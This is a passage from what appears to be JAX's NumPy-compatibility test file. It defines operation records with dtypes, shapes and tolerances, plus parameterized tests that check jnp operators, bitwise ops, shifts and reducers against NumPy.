op_record("tan", 1, number_dtypes, all_shapes,
partial(jtu.rand_uniform, low=-1.5, high=1.5), ["rev"],
inexact=True),
op_record("sinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("cosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
# TODO(b/142975473): on CPU, tanh for complex128 is only accurate to
# ~float32 precision.
# TODO(b/143135720): on GPU, tanh has only ~float32 precision.
op_record("tanh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
tolerance={np.float64: 1e-7, np.complex128: 1e-7},
inexact=True),
op_record("arcsin", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arccos", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arctan", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arctan2", 2, float_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arcsinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True, tolerance={np.complex64: 2E-4, np.complex128: 2E-14}),
op_record("arccosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True, tolerance={np.complex64: 2E-2, np.complex128: 2E-12}),
op_record("arctanh", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True, tolerance={np.float64: 1e-9}),
]
JAX_COMPOUND_OP_RECORDS = [
# angle has inconsistent 32/64-bit return types across numpy versions.
op_record("angle", 1, number_dtypes, all_shapes, jtu.rand_default, [],
check_dtypes=False, inexact=True),
op_record("atleast_1d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("atleast_2d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("atleast_3d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("cbrt", 1, default_dtypes, all_shapes, jtu.rand_some_inf, ["rev"],
inexact=True),
op_record("conjugate", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("deg2rad", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("divide", 2, number_dtypes, all_shapes, jtu.rand_nonzero, ["rev"],
inexact=True),
op_record("divmod", 2, int_dtypes + float_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("exp2", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
tolerance={jnp.bfloat16: 4e-2, np.float16: 1e-2}, inexact=True),
# TODO(b/142975473): on CPU, expm1 for float64 is only accurate to ~float32
# precision.
op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
test_name="expm1_large", tolerance={np.float64: 1e-8}, inexact=True),
op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_small_positive,
[], tolerance={np.float64: 1e-8}, inexact=True),
op_record("fix", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("fix", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("floor_divide", 2, number_dtypes, all_shapes,
jtu.rand_nonzero, ["rev"]),
op_record("floor_divide", 2, unsigned_dtypes, all_shapes,
jtu.rand_nonzero, ["rev"]),
op_record("fmin", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("fmax", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("fmod", 2, default_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("heaviside", 2, default_dtypes, all_shapes, jtu.rand_default, [],
inexact=True),
op_record("hypot", 2, default_dtypes, all_shapes, jtu.rand_default, [],
inexact=True),
op_record("kron", 2, number_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("outer", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("imag", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("iscomplex", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("isfinite", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isinf", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isnan", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isneginf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isposinf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isreal", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("isrealobj", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("log2", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("log10", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
test_name="log1p_large", tolerance={np.float64: 1e-12},
inexact=True),
op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_small_positive, [],
tolerance={np.float64: 1e-12}, inexact=True),
op_record("logaddexp", 2, float_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"],
tolerance={np.float64: 1e-12}, inexact=True),
op_record("logaddexp2", 2, float_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"],
tolerance={np.float16: 1e-2, np.float64: 2e-14}, inexact=True),
op_record("polyval", 2, number_dtypes, nonempty_nonscalar_array_shapes,
jtu.rand_default, [], check_dtypes=False,
tolerance={dtypes.bfloat16: 4e-2, np.float16: 1e-2,
np.float64: 1e-12}),
op_record("positive", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("power", 2, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
tolerance={np.complex128: 1e-14}, check_dtypes=False),
op_record("rad2deg", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("ravel", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("real", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("remainder", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-2}),
op_record("mod", 2, default_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("modf", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("modf", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("rint", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan,
[]),
op_record("rint", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("sign", 1, number_dtypes + unsigned_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, []),
# numpy 1.16 has trouble mixing uint and bfloat16, so we test these separately.
op_record("copysign", 2, default_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("copysign", 2, unsigned_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("sinc", 1, [t for t in number_dtypes if t != jnp.bfloat16],
all_shapes, jtu.rand_default, ["rev"],
tolerance={np.complex64: 1e-5}, inexact=True,
check_dtypes=False),
op_record("square", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("sqrt", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("transpose", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"],
check_dtypes=False),
op_record("true_divide", 2, all_dtypes, all_shapes, jtu.rand_nonzero,
["rev"], inexact=True),
op_record("ediff1d", 3, [np.int32], all_shapes, jtu.rand_default, []),
# TODO(phawkins): np.unwrap does not correctly promote its default period
# argument under NumPy 1.21 for bfloat16 inputs. It works fine if we
# explicitly pass a bfloat16 value that does not need promition. We should
# probably add a custom test harness for unwrap that tests the period
# argument anyway.
op_record("unwrap", 1, [t for t in float_dtypes if t != dtypes.bfloat16],
nonempty_nonscalar_array_shapes,
jtu.rand_default, ["rev"],
# numpy.unwrap always returns float64
check_dtypes=False,
# numpy cumsum is inaccurate, see issue #3517
tolerance={dtypes.bfloat16: 1e-1, np.float16: 1e-1}),
op_record("isclose", 2, [t for t in all_dtypes if t != jnp.bfloat16],
all_shapes, jtu.rand_small_positive, []),
op_record("gcd", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
op_record("lcm", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
]
JAX_BITWISE_OP_RECORDS = [
op_record("bitwise_and", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_not", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("invert", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_or", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_xor", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
]
JAX_REDUCER_RECORDS = [
op_record("mean", 1, number_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("nanmean", 1, inexact_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("nanprod", 1, all_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("nansum", 1, number_dtypes, all_shapes, jtu.rand_some_nan, []),
]
JAX_REDUCER_INITIAL_RECORDS = [
op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("max", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("min", 1, all_dtypes, all_shapes, jtu.rand_default, []),
]
JAX_REDUCER_WHERE_NO_INITIAL_RECORDS = [
op_record("all", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("any", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("mean", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
]
JAX_REDUCER_NO_DTYPE_RECORDS = [
op_record("all", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("any", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("max", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("min", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("nanmax", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanmin", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanvar", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("nanstd", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("ptp", 1, number_dtypes, nonempty_shapes, jtu.rand_default, []),
]
JAX_ARGMINMAX_RECORDS = [
op_record("argmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
op_record("argmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
op_record("nanargmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanargmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
]
JAX_OPERATOR_OVERLOADS = [
op_record("__add__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__sub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__mul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__eq__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__ne__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__lt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__le__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__gt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__ge__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__pos__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__neg__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__pow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
tolerance={np.float32: 2e-4, np.complex64: 2e-4, np.complex128: 1e-14}),
op_record("__mod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-1}),
op_record("__floordiv__", 2, default_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("__truediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
inexact=True),
op_record("__abs__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
# TODO(mattjj): __invert__ fails on bool dtypes because ~True == -2
op_record("__invert__", 1, int_dtypes, all_shapes, jtu.rand_default, []),
# TODO(mattjj): investigate these failures
# op_record("__or__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__and__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
# op_record("__xor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__divmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("__lshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
op_record("__rshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
]
JAX_RIGHT_OPERATOR_OVERLOADS = [
op_record("__radd__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rsub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rmul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rpow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
tolerance={np.float32: 2e-4, np.complex64: 1e-3}),
op_record("__rmod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-1}),
op_record("__rfloordiv__", 2, default_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("__rtruediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
inexact=True),
# op_record("__ror__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__rand__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
# op_record("__rxor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__rdivmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("__rlshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
op_record("__rrshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), [])
]
class _OverrideEverything(object):
pass
for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
if rec.nargs == 2:
setattr(_OverrideEverything, rec.name, lambda self, other: self)
class _OverrideNothing(object):
pass
for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
if rec.nargs == 2:
setattr(_OverrideNothing, rec.name, lambda self, other: NotImplemented)
def _dtypes_are_compatible_for_bitwise_ops(args):
if len(args) <= 1:
return True
is_signed = lambda dtype: jnp.issubdtype(dtype, np.signedinteger)
width = lambda dtype: jnp.iinfo(dtype).bits
x, y = args
if width(x) > width(y):
x, y = y, x
# The following condition seems a little ad hoc, but seems to capture what
# numpy actually implements.
return (
is_signed(x) == is_signed(y)
or (width(x) == 32 and width(y) == 32)
or (width(x) == 32 and width(y) == 64 and is_signed(y)))
def _shapes_are_broadcast_compatible(shapes):
accumulator = np.zeros([])
for shape in shapes:
try:
accumulator = accumulator + np.zeros(shape)
except ValueError:
return False
return True
def _shapes_are_equal_length(shapes):
return all(len(shape) == len(shapes[0]) for shape in shapes[1:])
def _promote_like_jnp(fun, inexact=False):
"""Decorator that promotes the arguments of `fun` to `jnp.result_type(*args)`.
jnp and np have different type promotion semantics; this decorator allows
tests make an np reference implementation act more like an jnp
implementation.
"""
def wrapper(*args, **kw):
flat_args = tree_util.tree_leaves(args)
if inexact and not any(jnp.issubdtype(jnp.result_type(x), jnp.inexact)
for x in flat_args):
dtype = jnp.result_type(jnp.float_, *flat_args)
else:
dtype = jnp.result_type(*flat_args)
args = tree_util.tree_map(lambda a: np.asarray(a, dtype), args)
return fun(*args, **kw)
return wrapper
@jtu.with_config(jax_numpy_rank_promotion="raise")
class LaxBackedNumpyTests(jtu.JaxTestCase):
"""Tests for LAX-backed Numpy implementation."""
def _GetArgsMaker(self, rng, shapes, dtypes, np_arrays=True):
def f():
out = [rng(shape, dtype or jnp.float_)
for shape, dtype in zip(shapes, dtypes)]
if np_arrays:
return out
return [jnp.asarray(a) if isinstance(a, (np.ndarray, np.generic)) else a
for a in out]
return f
def testNotImplemented(self):
for name in jnp._NOT_IMPLEMENTED:
func = getattr(jnp, name)
with self.assertRaises(NotImplementedError):
func()
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"check_dtypes": rec.check_dtypes, "tolerance": rec.tolerance,
"inexact": rec.inexact}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in itertools.chain(JAX_ONE_TO_ONE_OP_RECORDS,
JAX_COMPOUND_OP_RECORDS)))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOp(self, np_op, jnp_op, rng_factory, shapes, dtypes, check_dtypes,
tolerance, inexact):
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="invalid value.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
rng = rng_factory(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
tol = max(jtu.tolerance(dtype, tolerance) for dtype in dtypes)
tol = functools.reduce(jtu.join_tolerance,
[tolerance, tol, jtu.default_tolerance()])
self._CheckAgainstNumpy(_promote_like_jnp(np_op, inexact), jnp_op,
args_maker, check_dtypes=check_dtypes, tol=tol)
self._CompileAndCheck(jnp_op, args_maker, check_dtypes=check_dtypes,
atol=tol, rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
"tol": rec.tolerance}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in JAX_OPERATOR_OVERLOADS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOperatorOverload(self, name, rng_factory, shapes, dtypes, tol):
rng = rng_factory(self.rng())
# np and jnp arrays have different type promotion rules; force the use of
# jnp arrays.
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
fun = lambda *xs: getattr(operator, name.strip('_'))(*xs)
self._CompileAndCheck(fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
"op_tolerance": rec.tolerance}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in JAX_RIGHT_OPERATOR_OVERLOADS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testRightOperatorOverload(self, name, rng_factory, shapes, dtypes,
op_tolerance):
if shapes[1] is jtu.PYTHON_SCALAR_SHAPE:
raise SkipTest("scalars not implemented") # TODO(mattjj): clean up
rng = rng_factory(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
fun = lambda fst, snd: getattr(snd, name)(fst)
tol = max(jtu.tolerance(dtype, op_tolerance) for dtype in dtypes)
self._CompileAndCheck( fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": rec.test_name + "_{}".format(dtype),
"rng_factory": rec.rng_factory,
"op_name": rec.name, "dtype": dtype}
for rec in JAX_OPERATOR_OVERLOADS if rec.nargs == 2
for dtype in rec.dtypes))
def testBinaryOperatorDefers(self, op_name, rng_factory, dtype):
rng = rng_factory(self.rng())
arg = jax.device_put(rng((), dtype))
op = getattr(operator, op_name)
other = _OverrideEverything()
assert op(other, arg) is other
assert op(arg, other) is other
other = _OverrideNothing()
if op_name == "__eq__":
assert op(other, arg) is False
assert op(arg, other) is False
elif op_name == "__ne__":
assert op(other, arg) is True
assert op(arg, other) is True
else:
with self.assertRaises(TypeError):
op(other, arg)
with self.assertRaises(TypeError):
op(arg, other)
def testArrayEqualExamples(self):
# examples from the array_equal() docstring.
self.assertTrue(jnp.array_equal([1, 2], [1, 2]))
self.assertTrue(jnp.array_equal(np.array([1, 2]), np.array([1, 2])))
self.assertFalse(jnp.array_equal([1, 2], [1, 2, 3]))
self.assertFalse(jnp.array_equal([1, 2], [1, 4]))
a = np.array([1, np.nan])
self.assertFalse(jnp.array_equal(a, a))
self.assertTrue(jnp.array_equal(a, a, equal_nan=True))
a = np.array([1 + 1j])
b = a.copy()
a.real = np.nan
b.imag = np.nan
self.assertTrue(jnp.array_equal(a, b, equal_nan=True))
def testArrayEquivExamples(self):
# examples from the array_equiv() docstring.
self.assertTrue(jnp.array_equiv([1, 2], [1, 2]))
self.assertFalse(jnp.array_equiv([1, 2], [1, 3]))
with jax.numpy_rank_promotion('allow'):
self.assertTrue(jnp.array_equiv([1, 2], [[1, 2], [1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2, 1, 2], [1, 2, 1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2], [1, 3]]))
def testArrayModule(self):
if numpy_dispatch is None:
raise SkipTest('requires https://github.com/seberg/numpy-dispatch')
jnp_array = jnp.array(1.0)
np_array = np.array(1.0)
module = numpy_dispatch.get_array_module(jnp_array)
self.assertIs(module, jnp)
module = numpy_dispatch.get_array_module(jnp_array, np_array)
self.assertIs(module, jnp)
def f(x):
module = numpy_dispatch.get_array_module(x)
self.assertIs(module, jnp)
return x
jax.jit(f)(jnp_array)
jax.grad(f)(jnp_array)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
rec.test_name, shapes, dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in filter(
_dtypes_are_compatible_for_bitwise_ops,
itertools.combinations_with_replacement(rec.dtypes, rec.nargs)))
for rec in JAX_BITWISE_OP_RECORDS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testBitwiseOp(self, np_op, jnp_op, rng_factory, shapes, dtypes):
rng = rng_factory(self.rng())
if not config.x64_enabled and any(
jnp.iinfo(dtype).bits == 64 for dtype in dtypes):
self.skipTest("x64 types are disabled by jax_enable_x64")
args_maker = self._GetArgsMaker(rng, shapes, dtypes)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=jtu.PYTHON_SCALAR_SHAPE not in shapes)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op.__name__, shapes, dtypes),
"op": op, "dtypes": dtypes, "shapes": shapes}
for op in [jnp.left_shift, jnp.right_shift]
for shapes in filter(
_shapes_are_broadcast_compatible,
# TODO numpy always promotes to shift dtype for zero-dim shapes:
itertools.combinations_with_replacement(nonzerodim_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, int_dtypes_no_uint64) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testShiftOpAgainstNumpy(self, op, dtypes, shapes):
dtype, shift_dtype = dtypes
signed_mix = np.issubdtype(dtype, np.signedinteger) != \
np.issubdtype(shift_dtype, np.signedinteger)
has_32 = any(np.iinfo(d).bits == 32 for d in dtypes)
promoting_to_64 = has_32 and signed_mix
if promoting_to_64 and not config.x64_enabled:
self.skipTest("np.right_shift/left_shift promoting to int64"
"differs from jnp in 32 bit mode.")
info, shift_info = map(np.iinfo, dtypes)
x_rng = jtu.rand_int(self.rng(), low=info.min, high=info.max + 1)
# NumPy requires shifts to be non-negative and below the bit width:
shift_rng = jtu.rand_int(self.rng(), high=max(info.bits, shift_info.bits))
args_maker = lambda: (x_rng(shapes[0], dtype), shift_rng(shapes[1], shift_dtype))
self._CompileAndCheck(op, args_maker)
np_op = getattr(np, op.__name__)
self._CheckAgainstNumpy(np_op, op, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_dtype={}_keepdims={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis,
"None" if out_dtype is None else np.dtype(out_dtype).name, keepdims),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for out_dtype in [None] + rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_RECORDS))
def testReducer(self, np_op, jnp_op, rng_factory, shape, dtype, out_dtype,
axis, keepdims, inexact):
rng = rng_factory(self.rng())
@jtu.ignore_warning(category=np.ComplexWarning)
@jtu.ignore_warning(category=RuntimeWarning,
message="mean of empty slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="overflow encountered.*")
def np_fun(x):
x_cast = x if dtype != jnp.bfloat16 else x.astype(np.float32)
t = out_dtype if out_dtype != jnp.bfloat16 else np.float32
return np_op(x_cast, axis, dtype=t, keepdims=keepdims)
np_fun = _promote_like_jnp(np_fun, inexact)
jnp_fun = lambda x: jnp_op(x, axis, dtype=out_dtype, keepdims=keepdims)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_spec = {np.float16: 1e-2, np.int32: 1E-3, np.float32: 1e-3,
np.complex64: 1e-3, np.float64: 1e-5, np.complex128: 1e-5}
tol = jtu.tolerance(dtype, tol_spec)
tol = max(tol, jtu.tolerance(out_dtype, tol_spec)) if out_dtype else tol
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=jnp.bfloat16 not in (dtype, out_dtype),
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_NO_DTYPE_RECORDS))
def testReducerNoDtype(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, inexact):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="All-NaN slice encountered.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims)
args_maker = lambda: [rng(shape, dtype)]
tol = {np.float16: 0.002}
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol, atol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
